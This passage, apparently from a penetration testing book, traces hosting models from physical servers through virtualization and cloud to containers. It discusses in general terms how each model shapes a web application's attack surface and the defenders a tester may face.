Hosting options have evolved to better enable flexible and dynamic deployment - most customers deploy in multiple places.

Physical hosting

For many years, application architectures and design choices only had to consider the physical, barebones host for running various components of the architecture. As web applications scaled and incorporated specialized platforms, additional hosts were added to meet the need. New database servers were added as the data sets became more diverse, additional application servers would be needed to incorporate additional software platforms, and so on. Labor and hardware resources are dedicated to each additional instance, but they add cost, complexity, and waste to a data center. The workloads depended on dedicated resources, and this made them both vulnerable and inflexible.

Virtual hosting

Virtualization has drastically changed this paradigm. By allowing hardware resources to be pooled and allocated logically to multiple guest systems, a single pool of hardware resources could contain all of the disparate operating systems, applications, database types, and other application necessities on a homogenous pool of servers, which provided centralized management and dynamically allocated interfaces and devices to multiple organizations in a prioritized manner. Web applications, in particular, benefited from this, as the flexibility of virtualization has offered a means to create parallel application environments, clones of databases, and so on, for the purposes of testing, quality assurance, and the creation of surge capacity. Because system administrators could now manage multiple workloads on the same pool of resources, hardware and support costs (for example power, floor space, installation and provisioning) could also be reduced, assuming the licensing costs don't neutralize the inherent efficiencies. Many applications still run in virtual on-premise environments.

It's worth noting that virtualization has also introduced a new tension between application, system administration, and network teams with the shift in responsibilities for security-related aspects. As such, duties may not be clearly understood, properly fulfilled, or even accounted for. Sounds like a great pen testing opportunity!

Cloud hosting

Amazon took the concept of hosting virtual workloads a step further in 2006 and introduced cloud computing, with Microsoft Azure and others following shortly thereafter. The promise of turn-key Software as a Service (SaaS) running in highly survivable infrastructures via the internet allowed companies to build out applications without investing in hardware, bandwidth, or even real estate. Cloud computing was supposed to replace private cloud (traditional on premise systems), and some organizations have indeed made this happen. The predominant trend, however, is for most enterprises to see a split in applications between private and public cloud, based on the types and steady-state demand for these services.

Containers – a new trend

Containers offer a parallel or alternate packaging; rather than including the entire operating system and emulated hardware common in virtual machines, containers only bring their unique attributes and share these common ancillaries and functions, making them smaller and more agile. These traits have allowed large companies such as Google and Facebook to scale in real time to surge needs of their users with microsecond response times and complete the automation of both the spawning and the destruction of container workloads.

So, what does all of this mean to us? The location and packaging of a web application impacts its security posture. Both private and public cloud-hosted applications will normally integrate with other applications that may span in both domains. These integration points offer potential threat vectors that must be tested, or they can certainly fall victim to attack. Cloud-hosted applications may also benefit from protection hosted or offered by the service provider, but they may also limit the variety of defensive options and web platforms that can be supported. Understanding these constraints can help us focus on our probing and eliminating unnecessary work. The hosting paradigm also determines the composition of the team of defenders and operators that we are encountering. Cloud hosting companies may have more capable security operations centers, but a division of application security responsibility could result in a fragmentation of the intelligence and provide a gap that can be used to exploit the target. The underlying virtualization and operating systems available will also influence the choice of the application's platform, surrounding security mechanisms, and so on.